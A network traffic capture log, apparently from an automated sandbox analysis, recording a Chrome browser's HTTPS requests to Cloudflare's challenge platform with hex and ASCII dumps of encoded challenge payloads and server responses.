                                        2025-01-08 23:45:56 UTC1369INData Raw: 2b 6d 6d 4e 34 71 6d 6c 39 6e 72 46 79 66 49 2b 53 67 34 57 70 74 71 68 30 6c 48 32 39 69 33 61 4d 76 37 36 34 77 4c 42 2f 69 4a 4b 55 78 59 76 4c 67 4d 53 36 73 4a 79 62 76 5a 4c 51 72 5a 66 49 79 39 57 75 71 63 66 67 33 73 76 59 6e 74 6a 64 6f 64 69 6e 31 62 36 33 34 61 33 48 75 72 33 73 72 4b 33 30 73 74 36 77 39 72 50 34 77 36 37 51 74 62 32 36 30 50 58 65 42 4d 44 36 33 74 4c 47 36 51 50 49 41 4d 76 67 34 73 38 42 42 78 4d 4a 39 39 49 50 30 76 54 6d 31 76 41 4a 45 2b 38 4b 32 2f 6f 52 4a 41 6a 65 47 4e 2f 63 46 79 63 73 36 43 48 38 38 52 30 67 37 54 4d 43 49 77 7a 31 4c 2f 63 30 43 50 51 35 51 43 37 34 42 41 30 55 4f 7a 34 37 41 6b 6f 6c 52 69 74 48 4b 53 6b 2b 45 78 51 6b 4a 44 56 4f 53 78 6f 6b 54 6a 41 37 4f 46 4a 4a 4f 56 41 37 56 44 46 63 4f 6b
                                        Data Ascii: +mmN4qml9nrFyfI+Sg4Wptqh0lH29i3aMv764wLB/iJKUxYvLgMS6sJybvZLQrZfIy9Wuqcfg3svYntjdodin1b634a3Hur3srK30st6w9rP4w67Qtb260PXeBMD63tLG6QPIAMvg4s8BBxMJ99IP0vTm1vAJE+8K2/oRJAjeGN/cFycs6CH88R0g7TMCIwz1L/c0CPQ5QC74BA0UOz47AkolRitHKSk+ExQkJDVOSxokTjA7OFJJOVA7VDFcOk
                                        2025-01-08 23:45:56 UTC1369INData Raw: 6f 32 32 6e 6a 6f 43 32 74 6f 61 73 71 70 4f 57 73 49 6c 37 65 4c 75 66 77 4d 43 66 76 72 79 30 68 63 50 43 66 59 54 49 79 4a 36 6f 7a 49 6e 44 77 73 57 73 76 39 57 73 6c 61 37 5a 72 4e 6e 52 72 4b 7a 5a 30 2b 50 46 72 39 76 65 76 73 76 70 31 37 32 72 71 4e 36 72 71 2f 48 76 37 38 62 57 73 2f 50 4f 38 37 58 72 2b 4c 63 41 79 39 48 4c 76 4d 33 55 76 73 6a 69 31 65 76 66 43 51 59 47 41 67 58 51 44 4e 2f 54 41 41 7a 52 46 74 6a 75 42 68 76 75 44 76 4d 44 34 65 4d 64 46 65 50 6a 39 68 67 4c 43 76 77 58 36 52 7a 2b 4b 53 6b 53 38 44 55 4a 41 42 67 77 4a 6a 77 73 43 54 6f 62 4c 50 73 75 50 54 41 39 4f 78 63 4a 4e 6b 77 74 47 67 73 35 51 44 38 63 4d 45 5a 4d 53 30 73 52 4f 55 6c 4c 47 6c 30 64 47 56 41 79 59 6c 6c 57 57 44 41 34 4a 47 64 43 57 6c 68 56 57 6b 56
                                        Data Ascii: o22njoC2toasqpOWsIl7eLufwMCfvry0hcPCfYTIyJ6ozInDwsWsv9Wsla7ZrNnRrKzZ0+PFr9vevsvp172rqN6rq/Hv78bWs/PO87Xr+LcAy9HLvM3Uvsji1evfCQYGAgXQDN/TAAzRFtjuBhvuDvMD4eMdFePj9hgLCvwX6Rz+KSkS8DUJABgwJjwsCTobLPsuPTA9OxcJNkwtGgs5QD8cMEZMS0sROUlLGl0dGVAyYllWWDA4JGdCWlhVWkV
                                        2025-01-08 23:45:56 UTC1369INData Raw: 70 39 30 6a 71 4f 77 6d 36 71 38 6c 36 75 58 71 38 43 74 74 38 57 61 78 37 71 69 67 34 69 46 69 36 43 35 75 63 4f 2f 6e 36 57 7a 75 4b 6e 43 79 4a 75 63 32 5a 57 39 71 64 48 59 75 62 6a 52 78 61 47 31 35 4b 53 6c 70 65 71 73 75 72 6e 74 78 66 4f 73 38 4d 6d 70 39 72 6e 50 2f 4e 6a 6c 76 64 76 79 7a 37 77 46 33 77 62 43 78 66 41 47 31 51 7a 55 34 65 50 61 33 39 6e 79 36 4f 72 64 38 76 59 54 46 50 6b 47 47 52 73 67 46 69 48 65 34 4f 50 37 46 67 48 66 32 68 30 5a 46 69 45 46 35 68 67 71 43 41 34 43 4e 68 55 67 49 79 45 71 45 7a 6f 2b 48 41 63 37 2f 54 51 58 46 52 34 63 45 54 6f 68 2b 78 6b 38 41 77 73 65 50 41 6f 4a 4b 41 35 45 53 54 38 6f 57 44 6b 70 4d 78 64 65 56 31 4e 68 4d 6c 46 63 4e 56 38 31 4d 31 68 6e 58 6c 56 56 61 6b 56 76 61 31 31 73 62 45 4d 77
                                        Data Ascii: p90jqOwm6q8l6uXq8Ctt8Wax7qig4iFi6C5ucO/n6WzuKnCyJuc2ZW9qdHYubjRxaG15KSlpeqsurntxfOs8Mmp9rnP/Njlvdvyz7wF3wbCxfAG1QzU4ePa39ny6Ord8vYTFPkGGRsgFiHe4OP7FgHf2h0ZFiEF5hgqCA4CNhUgIyEqEzo+HAc7/TQXFR4cEToh+xk8AwsePAoJKA5EST8oWDkpMxdeV1NhMlFcNV81M1hnXlVVakVva11sbEMw
                                        2025-01-08 23:45:56 UTC1369INData Raw: 68 32 65 5a 61 53 77 61 75 61 77 4b 62 46 6e 4c 76 47 70 4b 33 43 78 5a 32 2b 78 4b 50 50 77 73 6d 32 6b 4d 4c 4b 6c 71 65 55 70 39 33 52 73 35 36 39 32 62 58 53 73 62 50 6f 77 2b 54 68 33 4c 66 69 35 61 33 4a 7a 4d 44 47 70 39 58 72 79 2f 58 57 38 76 33 72 37 76 62 4a 77 4e 58 31 35 64 6e 30 35 64 48 65 2b 4e 67 4e 35 78 41 4a 41 77 4c 37 33 38 38 49 37 41 6e 34 39 74 50 59 37 68 62 76 48 50 6b 58 38 2f 67 6a 46 65 48 6b 45 68 54 35 48 79 67 6c 45 43 51 43 47 78 73 53 43 43 4d 47 4d 2b 38 70 39 52 33 37 4b 54 63 72 50 6a 49 37 4e 2f 73 31 42 45 67 2f 4f 68 73 45 44 45 4d 65 55 45 42 4a 53 7a 38 4f 53 79 68 4d 4f 45 70 54 4e 6a 68 4a 51 44 70 61 56 45 74 51 57 31 6f 35 55 45 6c 62 4a 6d 4e 75 58 53 74 43 4f 32 6f 74 56 58 4e 6c 4d 6a 46 54 61 54 5a 6e 66
                                        Data Ascii: h2eZaSwauawKbFnLvGpK3CxZ2+xKPPwsm2kMLKlqeUp93Rs5692bXSsbPow+Th3Lfi5a3JzMDGp9Xry/XW8v3r7vbJwNX15dn05dHe+NgN5xAJAwL7388I7An49tPY7hbvHPkX8/gjFeHkEhT5HyglECQCGxsSCCMGM+8p9R37KTcrPjI7N/s1BEg/OhsEDEMeUEBJSz8OSyhMOEpTNjhJQDpaVEtQW1o5UElbJmNuXStCO2otVXNlMjFTaTZnf
                                        2025-01-08 23:45:56 UTC1369INData Raw: 43 6a 63 4f 47 6d 4d 62 49 75 49 71 56 70 59 72 4b 6d 61 72 4d 6b 71 69 65 6e 36 57 69 31 4b 72 62 32 39 65 32 71 64 33 62 33 35 2f 65 30 37 61 33 36 4b 6a 6e 71 4f 6a 58 76 65 32 77 32 37 36 75 39 4d 69 79 34 72 6e 6e 39 63 61 7a 2f 4f 2b 32 79 72 6a 39 7a 4c 76 32 42 74 48 54 43 41 59 48 31 64 62 72 33 68 44 37 44 42 55 53 31 4d 6e 54 46 63 7a 56 48 42 66 62 30 64 6f 67 48 50 72 74 35 65 55 43 4a 66 67 43 43 2b 72 31 4c 4f 34 42 4c 7a 45 68 38 76 30 4f 38 6a 4d 43 45 7a 58 36 45 51 63 49 44 67 73 39 45 30 51 2f 42 50 6b 47 52 67 6e 39 44 45 6f 6c 43 51 39 4f 45 54 49 4c 55 79 6f 6e 49 31 64 49 53 53 6c 58 54 6d 45 5a 46 47 45 33 47 7a 41 36 4a 7a 67 63 61 54 63 66 51 54 63 38 51 79 52 7a 63 6a 30 2f 54 32 46 43 4f 57 4d 75 65 6e 6b 39 4d 6a 39 38 66 58
                                        Data Ascii: CjcOGmMbIuIqVpYrKmarMkqien6Wi1Krb29e2qd3b35/e07a36KjnqOjXve2w276u9Miy4rnn9caz/O+2yrj9zLv2BtHTCAYH1dbr3hD7DBUS1MnTFczVHBfb0dogHPrt5eUCJfgCC+r1LO4BLzEh8v0O8jMCEzX6EQcIDgs9E0Q/BPkGRgn9DEolCQ9OETILUyonI1dISSlXTmEZFGE3GzA6JzgcaTcfQTc8QyRzcj0/T2FCOWMuenk9Mj98fX
                                        2025-01-08 23:45:56 UTC1369INData Raw: 79 38 7a 49 6a 4d 66 50 7a 5a 44 50 31 4e 48 50 6b 4a 58 55 6d 4b 32 56 32 64 65 74 6e 39 32 31 31 36 44 69 7a 39 2f 6f 34 39 50 58 70 75 69 73 35 36 7a 73 36 2b 75 30 38 62 54 76 73 2f 58 4e 37 37 72 34 76 41 43 35 2f 65 75 38 77 67 48 76 37 38 49 45 42 50 50 47 43 76 63 51 79 77 2f 37 45 4d 38 54 36 51 7a 51 46 41 51 45 48 52 72 63 47 4f 41 65 34 50 48 69 49 68 41 6f 35 43 62 6f 43 75 6b 71 4b 4f 6a 76 4c 76 41 63 4e 54 49 4b 4f 50 51 30 4a 44 44 34 4f 79 68 41 41 44 30 73 4c 41 42 42 42 53 59 45 52 68 35 45 44 55 73 69 4f 41 35 4e 45 55 67 50 55 56 41 6d 46 6c 59 75 46 52 78 5a 48 56 51 64 58 7a 5a 4d 49 32 42 51 58 43 46 6e 56 45 6f 70 61 47 68 4f 4b 6d 35 47 62 48 56 79 59 45 6f 35 64 6a 6c 73 4e 6e 6c 6f 66 45 42 2f 56 6d 49 39 67 33 42 6d 53 49 5a
                                        Data Ascii: y8zIjMfPzZDP1NHPkJXUmK2V2detn92116Diz9/o49PXpuis56zs6+u08bTvs/XN77r4vAC5/eu8wgHv78IEBPPGCvcQyw/7EM8T6QzQFAQEHRrcGOAe4PHiIhAo5CboCukqKOjvLvAcNTIKOPQ0JDD4OyhAAD0sLABBBSYERh5EDUsiOA5NEUgPUVAmFlYuFRxZHVQdXzZMI2BQXCFnVEopaGhOKm5GbHVyYEo5djlsNnlofEB/VmI9g3BmSIZ
                                        2025-01-08 23:45:56 UTC1369INData Raw: 4c 79 6c 6c 4b 66 56 72 38 32 6b 31 4b 32 63 72 72 65 33 31 61 7a 63 74 61 53 30 6f 36 4c 65 35 73 4f 64 36 4b 50 43 75 39 33 75 32 2f 43 2b 77 4b 7a 34 77 63 69 34 74 4c 6e 36 30 73 2f 58 74 39 62 50 38 51 50 76 42 4d 59 49 42 4d 4c 74 42 77 77 4e 32 65 44 51 79 67 55 56 46 2b 50 76 47 50 51 4e 36 2b 30 4e 33 68 41 68 49 78 58 75 4a 43 44 65 46 69 4d 61 36 4f 7a 38 4a 2b 6f 63 4c 77 7a 73 4d 51 63 4b 37 69 73 7a 4f 44 6b 47 44 76 7a 32 4c 30 41 38 2b 6a 59 2f 4e 78 6f 4a 47 6b 4d 48 50 45 73 70 48 6b 30 6b 4a 67 74 4c 54 31 52 56 49 69 6f 75 45 7a 35 63 57 78 74 62 4c 7a 5a 57 4f 31 39 6b 5a 54 49 38 50 69 4e 6e 4f 30 4a 69 52 33 42 73 4b 32 39 44 53 6d 35 50 63 33 68 35 52 6b 35 6f 4e 33 74 50 56 6e 70 62 68 49 41 2f 67 31 64 65 68 6d 4f 48 6a 49 31 61
                                        Data Ascii: LyllKfVr82k1K2crre31azctaS0o6Le5sOd6KPCu93u2/C+wKz4wci4tLn60s/Xt9bP8QPvBMYIBMLtBwwN2eDQygUVF+PvGPQN6+0N3hAhIxXuJCDeFiMa6Oz8J+ocLwzsMQcK7iszODkGDvz2L0A8+jY/NxoJGkMHPEspHk0kJgtLT1RVIiouEz5cWxtbLzZWO19kZTI8PiNnO0JiR3BsK29DSm5Pc3h5Rk5oN3tPVnpbhIA/g1dehmOHjI1a


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        21192.168.2.1649743104.18.94.414432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:45:57 UTC598OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/983776855:1736379108:IMxQVsLwXGlZd6n2Z41p0MdEOBPL-IrpzZlTwr2AUq0/8ff01048fb6d4364/R_rTQntoF2VLgYZkDUVyN5HYUuUJHQ5sQpdDYboamyI-1736379951-1.1.1.1-8HJ56pYygoOERHrUddPOUm5UWJPLWIxfd21ZbdJVLTboWU.17jbFjn_jHtL9eDOz HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-08 23:45:57 UTC379INHTTP/1.1 404 Not Found
                                        Date: Wed, 08 Jan 2025 23:45:57 GMT
                                        Content-Type: application/json
                                        Content-Length: 7
                                        Connection: close
                                        cf-chl-out: Y/jnf01+F/QUteOAu1AIVc9z0szHhBSXfd8=$aQRFxP9bn1+3Yau9
                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Server: cloudflare
                                        CF-RAY: 8ff0106e5ea672a1-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-08 23:45:57 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                        Data Ascii: invalid


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        22192.168.2.1649744104.18.94.414432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:46:01 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/983776855:1736379108:IMxQVsLwXGlZd6n2Z41p0MdEOBPL-IrpzZlTwr2AUq0/8ff01048fb6d4364/R_rTQntoF2VLgYZkDUVyN5HYUuUJHQ5sQpdDYboamyI-1736379951-1.1.1.1-8HJ56pYygoOERHrUddPOUm5UWJPLWIxfd21ZbdJVLTboWU.17jbFjn_jHtL9eDOz HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        Content-Length: 34567
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        Content-type: application/x-www-form-urlencoded
                                        CF-Chl-RetryAttempt: 0
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        CF-Challenge: R_rTQntoF2VLgYZkDUVyN5HYUuUJHQ5sQpdDYboamyI-1736379951-1.1.1.1-8HJ56pYygoOERHrUddPOUm5UWJPLWIxfd21ZbdJVLTboWU.17jbFjn_jHtL9eDOz
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Origin: https://challenges.cloudflare.com
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/sr46z/0x4AAAAAAA4FpD7uVAQN4KLZ/auto/fbE/normal/auto/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-08 23:46:01 UTC16384OUTData Raw: 76 5f 38 66 66 30 31 30 34 38 66 62 36 64 34 33 36 34 3d 56 54 78 58 50 6e 42 4e 24 6e 24 70 78 70 74 42 6f 33 78 58 6d 54 42 48 42 62 32 43 32 31 5a 32 6a 39 32 72 32 58 58 42 39 70 25 32 62 32 59 66 58 78 36 58 53 32 4a 35 32 39 58 6d 4f 4a 32 5a 6f 78 32 79 58 33 74 32 34 59 33 75 78 32 62 58 35 4b 41 32 42 59 58 58 47 78 62 4c 53 70 41 32 61 39 42 55 4b 74 32 38 75 31 4f 56 58 45 74 32 4e 79 32 79 34 78 32 75 4c 49 6f 32 48 66 73 74 4b 24 24 2b 39 35 4a 53 32 35 4a 38 54 32 36 58 42 4e 32 6e 41 4b 32 2b 77 47 37 53 53 32 79 70 73 70 66 78 56 70 39 6f 78 32 6a 53 43 70 68 53 76 37 4c 48 53 42 50 2b 76 4d 76 2d 39 32 56 6a 53 32 38 78 52 51 42 53 65 4b 45 42 35 33 42 2d 56 48 4e 6c 78 72 32 2d 4d 6b 41 39 43 64 6f 7a 6c 6f 55 77 74 45 68 48 55 64 30 79
                                        Data Ascii: v_8ff01048fb6d4364=VTxXPnBN$n$pxptBo3xXmTBHBb2C21Z2j92r2XXB9p%2b2YfXx6XS2J529XmOJ2Zox2yX3t24Y3ux2bX5KA2BYXXGxbLSpA2a9BUKt28u1OVXEt2Ny2y4x2uLIo2HfstK$$+95JS25J8T26XBN2nAK2+wG7SS2ypspfxVp9ox2jSCphSv7LHSBP+vMv-92VjS28xRQBSeKEB53B-VHNlxr2-MkA9CdozloUwtEhHUd0y
                                        2025-01-08 23:46:01 UTC16384OUTData Raw: 45 64 6e 45 42 68 58 79 44 55 59 53 53 70 68 69 6c 37 58 32 61 78 55 32 43 32 6e 58 32 72 32 51 74 78 4b 6e 54 32 68 55 74 53 70 5a 30 35 39 33 53 32 4e 32 70 32 45 54 6e 54 4a 79 32 70 39 42 37 32 53 58 6a 65 6e 2b 32 74 58 6a 48 6e 72 32 4f 32 6e 24 32 49 32 61 54 6d 43 70 62 58 2d 72 5a 48 32 62 32 4b 32 70 48 32 58 32 4e 32 72 59 58 46 32 45 58 6d 61 42 24 32 58 58 6b 78 70 2d 58 48 32 56 6d 42 46 53 4a 54 56 6d 6e 48 32 4d 4a 33 31 6e 37 32 6c 32 56 49 42 45 32 6e 32 56 44 70 4b 42 7a 53 70 36 70 4e 32 66 58 42 53 70 37 42 33 32 6b 4c 71 45 32 4d 32 4d 31 6e 41 32 33 4a 6a 24 42 35 32 48 32 33 31 32 37 42 70 32 68 53 33 4b 42 5a 32 56 78 35 33 39 42 33 42 53 32 74 42 33 32 45 37 58 58 32 76 63 24 5a 70 63 30 41 32 38 39 42 48 32 66 32 6b 58 70 63 67
                                        Data Ascii: EdnEBhXyDUYSSphil7X2axU2C2nX2r2QtxKnT2hUtSpZ0593S2N2p2ETnTJy2p9B72SXjen+2tXjHnr2O2n$2I2aTmCpbX-rZH2b2K2pH2X2N2rYXF2EXmaB$2XXkxp-XH2VmBFSJTVmnH2MJ31n72l2VIBE2n2VDpKBzSp6pN2fXBSp7B32kLqE2M2M1nA23Jj$B52H23127Bp2hS3KBZ2Vx539B3BS2tB32E7XX2vc$Zpc0A289BH2f2kXpcg
                                        2025-01-08 23:46:01 UTC1799OUTData Raw: 71 4e 66 7a 55 46 6d 31 24 69 36 2d 56 41 7a 55 47 4a 47 58 4b 31 46 47 54 73 32 34 71 48 45 70 4f 73 62 48 2b 4b 32 4b 32 34 4d 4e 78 5a 42 32 30 47 65 74 66 71 58 6e 4b 51 39 32 65 32 52 39 78 6a 55 4b 32 76 67 43 47 4c 59 50 2d 46 68 53 70 46 53 4e 2d 75 2d 52 35 32 51 48 64 24 6e 33 4a 68 6a 30 37 32 65 32 51 32 74 46 33 4d 54 31 6e 2b 5a 39 54 56 5a 58 6a 51 54 52 4a 49 63 73 72 70 45 70 56 32 6b 24 42 53 39 67 77 46 46 6f 51 6a 2b 55 74 74 62 39 52 4d 66 71 24 42 6f 71 32 6a 54 2b 31 4f 32 4d 58 35 37 32 45 51 5a 30 31 78 6e 51 52 52 39 38 44 77 72 69 4d 58 76 41 66 52 74 73 74 70 55 6e 43 32 4f 71 39 6f 34 4f 39 47 4a 36 6b 56 2b 51 61 2d 2b 48 38 38 71 34 78 47 39 70 6e 32 66 58 72 4d 58 4e 75 35 35 46 73 6e 2d 75 45 4a 69 4e 4b 4a 58 4e 4e 47 67
                                        Data Ascii: qNfzUFm1$i6-VAzUGJGXK1FGTs24qHEpOsbH+K2K24MNxZB20GetfqXnKQ92e2R9xjUK2vgCGLYP-FhSpFSN-u-R52QHd$n3Jhj072e2Q2tF3MT1n+Z9TVZXjQTRJIcsrpEpV2k$BS9gwFFoQj+Uttb9RMfq$Boq2jT+1O2MX572EQZ01xnQRR98DwriMXvAfRtstpUnC2Oq9o4O9GJ6kV+Qa-+H88q4xG9pn2fXrMXNu55Fsn-uEJiNKJXNNGg
                                        2025-01-08 23:46:01 UTC1361INHTTP/1.1 200 OK
                                        Date: Wed, 08 Jan 2025 23:46:01 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4776
                                        Connection: close
                                        cf-chl-out-s: lNioYop3Efe50r33c0NdU/B6ly9FMW0VtgtUWTVNRuiFJNNwDWX/tGqfKv4Pw9qypYlPLpkjoc52sTxTKD1QINCmmksMapaScDn+20xYLNHqkGs+t0zoD5qmRARy/lFo0ODfw7O98QLcsn0qwGw5+RHvS2ZpfpOmdbmTh2az6YPMffPYUeS7TZW1J6Zw/aKX1MCwBWY4T6IgAd3KRyEKZSqs/dygAFjnoyqrcpzjLmy+mkXwBPVu1Ac86I7BSaoisiTQno+W4tlLIoMXtgnjVDUW2kgKAAFqVQjTAvys6Aypm4xgcJjvEgqSgfeiMfvjNzcI16ksvG+jmGc3pzMrujP/bCCr8c6VBs0kTDIebQiSOl/dx1d8as8mwPn2yUrjVrlRKQb38d3cZxj8iuli6L9wzYYrCvvTA4BARGoN8NCP0dQ7HuG/Kor8TcBlMglLj0txzw4GAuVIGzerAsEvA1EkzTEoOjl0r9ha2T3C/RDmVY9dFiPAFIEov0arbpTLIpuR5gptBLec1MixYPUA0mu8VPdjNgnrw3C0owb+Khr+OTLAMzkx54wnfCDCUSsG4DLWTNXLge7W4BwOlNEBuARg/iP8AMzN2ovQd27pchBDWmbWXu8lyi+bKHlUSbNvpyEqaZfjFteVaV3noKyZDCK55pk7T/plt/6/D9LStwGDfTMAvC7yYklFAJtHuKRxb5Uk1KKJSl7ba+mZZd7b2BvQDa/a1Vij7Z7WjQZBwR4qn4yAZiv3etXa5uXdMJ1bU+D9W79OPZTYIaTN1d4nCDzsWMeSznzvCyj5UN+Xa4+w5mNSnUWSB2tQMziXoO2qVFQqJkuwau5a6+ouNIShxitlb4MlcDjgV9af/5wi+gq/1kpYK4tU50LoITAocjX4pV55LAFxVAh9hoI20CgknLVo0OoSE3Z7B+71PBqv0nYs2RNDEEyW7VK3wrzFL3Sc3Ozk+J/DYa+fOWJcmyPsLoHl5X8eMxrjRSfHmS3GXtk=$rjmFk [TRUNCATED]
                                        cf-chl-out: Y49OCL5bKOXU1E4oDpwz33tdmxTezuo4nw7ebDgANPS9G9131qAA6le/YAaz10OqIqWDOAxr3jevcWRMB+SWO4HZGvvBuuLwkJHC8nup3g==$iPEnAmj5tu6JVtWq
                                        Server: cloudflare
                                        CF-RAY: 8ff0108538fa41ff-EWR
                                        2025-01-08 23:46:01 UTC32INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                        Data Ascii: alt-svc: h3=":443"; ma=86400
                                        2025-01-08 23:46:01 UTC1345INData Raw: 69 47 52 7a 62 58 61 4e 53 70 43 53 62 46 6d 53 6a 31 46 78 6a 33 4f 61 6f 35 2b 45 59 4a 2b 49 68 5a 2b 61 6c 34 31 34 69 70 36 4c 70 36 75 72 6b 4b 31 76 70 59 56 7a 74 61 35 39 6d 5a 79 35 67 5a 32 67 73 35 65 65 6c 4c 69 59 6c 4d 76 44 75 4d 69 2f 6d 62 32 4f 6f 71 50 46 6b 72 57 53 30 4c 76 46 72 39 2b 61 6d 39 43 5a 75 63 50 63 6f 4a 6e 51 32 39 65 2b 36 37 76 5a 71 73 57 74 33 73 50 67 78 76 58 74 77 38 50 52 79 72 54 2b 37 64 48 5a 75 2b 36 39 32 63 48 30 77 75 49 49 30 73 4c 57 78 64 59 4e 2b 74 7a 49 41 2f 4d 52 33 68 62 76 47 64 6a 4e 30 78 37 58 46 77 45 63 33 52 41 41 48 74 2f 6e 46 78 4c 79 36 2b 55 72 35 69 6f 69 4b 53 73 47 4d 50 37 77 4b 77 45 61 4a 7a 51 53 2f 66 62 33 49 68 49 30 46 54 78 48 4c 7a 34 6e 52 69 4d 30 46 78 39 46 4f 45 64
                                        Data Ascii: iGRzbXaNSpCSbFmSj1Fxj3Oao5+EYJ+IhZ+al414ip6Lp6urkK1vpYVzta59mZy5gZ2gs5eelLiYlMvDuMi/mb2OoqPFkrWS0LvFr9+am9CZucPcoJnQ29e+67vZqsWt3sPgxvXtw8PRyrT+7dHZu+692cH0wuII0sLWxdYN+tzIA/MR3hbvGdjN0x7XFwEc3RAAHt/nFxLy6+Ur5ioiKSsGMP7wKwEaJzQS/fb3IhI0FTxHLz4nRiM0Fx9FOEd
                                        2025-01-08 23:46:01 UTC1369INData Raw: 55 39 58 55 54 78 37 56 48 64 45 6a 6e 35 35 59 57 70 4c 64 46 61 55 59 48 70 6d 55 5a 71 48 61 59 36 4e 61 32 36 68 6d 6e 47 6b 6c 35 71 68 64 36 6c 6e 6c 58 79 44 69 32 6c 2f 66 5a 36 67 68 49 36 75 71 4c 6d 50 6b 49 65 4a 72 4b 6e 43 77 59 78 2f 74 49 54 41 67 36 53 56 75 4c 57 4e 6e 36 61 35 6e 4b 4b 63 30 5a 2b 69 31 61 66 59 71 74 65 54 75 39 76 4a 73 4e 47 76 30 73 33 69 73 64 54 65 31 4f 66 45 33 74 2b 38 33 62 2b 37 75 38 62 51 77 61 7a 4f 37 62 48 45 30 38 7a 6e 7a 72 58 67 33 4e 54 38 75 2f 58 45 42 66 58 41 79 75 4d 43 78 75 48 58 41 2f 44 53 41 2b 50 65 46 4e 62 67 42 74 6b 4a 31 68 6f 66 47 66 77 63 38 53 48 77 37 2b 59 53 41 4e 76 6f 48 41 67 41 34 4f 34 6e 48 2f 41 6a 43 52 50 2b 39 69 38 56 4f 50 6f 55 2b 51 72 2b 48 50 6f 54 52 43 42 44
                                        Data Ascii: U9XUTx7VHdEjn55YWpLdFaUYHpmUZqHaY6Na26hmnGkl5qhd6lnlXyDi2l/fZ6ghI6uqLmPkIeJrKnCwYx/tITAg6SVuLWNn6a5nKKc0Z+i1afYqteTu9vJsNGv0s3isdTe1OfE3t+83b+7u8bQwazO7bHE08znzrXg3NT8u/XEBfXAyuMCxuHXA/DSA+PeFNbgBtkJ1hofGfwc8SHw7+YSANvoHAgA4O4nH/AjCRP+9i8VOPoU+Qr+HPoTRCBD
                                        2025-01-08 23:46:01 UTC1369INData Raw: 5a 4d 5a 33 42 73 65 34 31 2f 61 49 4e 6c 55 4a 65 4a 6b 48 6c 58 68 33 36 59 64 49 32 54 59 47 53 51 68 70 2b 6b 6b 34 71 4e 71 70 70 2b 6d 58 32 6c 63 6f 56 39 6b 5a 53 4e 67 71 4f 45 74 4a 69 66 66 4a 78 34 77 36 76 43 6d 33 36 47 68 71 50 46 74 37 57 69 7a 6f 36 4b 75 59 75 54 79 63 33 50 77 74 48 55 6d 5a 72 4a 6d 4a 79 6e 6f 4b 6e 69 72 61 44 6d 35 74 6a 46 70 39 72 67 35 2b 33 66 77 74 37 4a 32 73 69 38 33 73 48 31 72 2f 48 46 36 74 6a 78 79 39 33 57 73 2f 6a 79 39 50 4b 39 41 41 58 34 31 2f 76 6f 36 4f 44 50 41 63 2f 4c 41 38 38 43 35 51 51 56 47 64 49 4d 42 78 45 67 30 52 55 65 32 65 50 69 42 79 4c 6c 38 77 6a 69 33 53 34 45 35 52 2f 75 42 2b 77 74 48 67 51 30 44 69 59 57 50 44 55 49 47 6a 34 41 39 7a 59 56 47 44 34 6b 51 78 4a 4a 53 42 6f 32 41
                                        Data Ascii: ZMZ3Bse41/aINlUJeJkHlXh36YdI2TYGSQhp+kk4qNqpp+mX2lcoV9kZSNgqOEtJiffJx4w6vCm36GhqPFt7Wizo6KuYuTyc3PwtHUmZrJmJynoKniraDm5tjFp9rg5+3fwt7J2si83sH1r/HF6tjxy93Ws/jy9PK9AAX41/vo6ODPAc/LA88C5QQVGdIMBxEg0RUe2ePiByLl8wji3S4E5R/uB+wtHgQ0DiYWPDUIGj4A9zYVGD4kQxJJSBo2A
                                        2025-01-08 23:46:01 UTC693INData Raw: 56 62 4a 56 72 69 70 4b 5a 6c 70 56 35 6d 48 4f 4d 6f 4a 36 63 6b 70 32 6c 65 36 57 42 5a 4b 4e 6d 67 47 56 68 70 47 71 45 69 47 75 68 62 59 75 70 72 62 56 37 6b 4b 6d 4e 71 38 47 32 65 70 6d 69 67 4c 2b 47 6f 37 47 43 6f 4d 6d 62 6d 73 71 77 78 34 7a 4f 30 62 43 54 6c 34 36 34 6c 4d 76 49 6d 39 71 7a 6e 74 75 66 33 65 48 66 34 4e 2b 69 75 4f 50 6c 78 38 37 74 36 2b 6d 2f 37 2b 2f 73 72 2f 66 33 35 65 2f 37 39 4d 66 63 74 2b 6e 78 32 41 4c 44 33 50 30 44 33 4e 2f 62 77 62 33 71 43 77 2f 34 78 76 6e 4c 44 39 38 44 7a 64 55 53 38 42 76 75 35 78 4c 77 33 65 73 44 39 4f 48 77 41 4e 38 52 39 2f 37 38 36 52 6e 6f 41 42 6b 41 43 54 44 78 46 53 77 32 39 53 6f 62 4e 77 37 36 4e 54 6b 6f 2f 68 55 41 4c 76 30 41 47 54 4d 2b 49 78 64 46 48 55 55 49 41 6a 41 69 44 45
